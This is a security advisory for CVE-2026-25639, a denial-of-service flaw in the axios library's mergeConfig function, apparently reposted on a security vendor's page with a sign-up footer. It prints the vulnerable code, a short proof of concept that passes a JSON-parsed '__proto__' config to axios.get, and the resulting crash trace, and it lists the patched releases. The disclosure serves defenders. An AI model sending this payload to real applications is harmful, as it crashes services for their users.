Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
GHSA-43fc-jf86-j433 · CVE-2026-25639
Published · Modified
Description
Denial of Service via proto Key in mergeConfig
Summary
The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
Details
The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:
utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
const merge = mergeMap[prop] || mergeDeepProperties;
const configValue = merge(config1[prop], config2[prop], prop);
(utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});
When prop is '__proto__':
JSON.parse('{"__proto__": {...}}')creates an object with__proto__as an own enumerable propertyObject.keys()includes'__proto__'in the iterationmergeMap['__proto__']performs prototype chain lookup, returningObject.prototype(truthy object)- The expression
mergeMap[prop] || mergeDeepPropertiesevaluates toObject.prototype Object.prototype(...)throwsTypeError: merge is not a function
The mergeConfig function is called by:
Axios._request()atlib/core/Axios.js:75Axios.getUri()atlib/core/Axios.js:201- All HTTP method shortcuts (
get,post, etc.) atlib/core/Axios.js:211,224
PoC
import axios from "axios";
const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);
Reproduction steps:
- Clone axios repository or
npm install axios - Create file
poc.mjswith the code above - Run:
node poc.mjs - Observe the TypeError crash
Verified output (axios 1.13.4):
TypeError: merge is not a function
at computeConfigValue (lib/core/mergeConfig.js:100:25)
at Object.forEach (lib/utils.js:280:10)
at mergeConfig (lib/core/mergeConfig.js:98:9)
Control tests performed:
| Test | Config | Result |
|---|---|---|
| Normal config | {"timeout": 5000} |
SUCCESS |
| Malicious config | JSON.parse('{"__proto__": {"x": 1}}') |
CRASH |
| Nested object | {"headers": {"X-Test": "value"}} |
SUCCESS |
Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.
Impact
Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.
Affected environments:
- Node.js servers using axios for HTTP requests
- Any backend that passes parsed JSON to axios configuration
This is NOT prototype pollution - the application crashes before any assignment occurs.
References
- WEB https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-25639
- WEB https://github.com/axios/axios/pull/7369
- WEB https://github.com/axios/axios/pull/7388
- WEB https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
- WEB https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
- PACKAGE https://github.com/axios/axios
- WEB https://github.com/axios/axios/releases/tag/v0.30.3
- WEB https://github.com/axios/axios/releases/tag/v1.13.5
Ready to move
Start Securing
Free, no credit card | First findings in minutes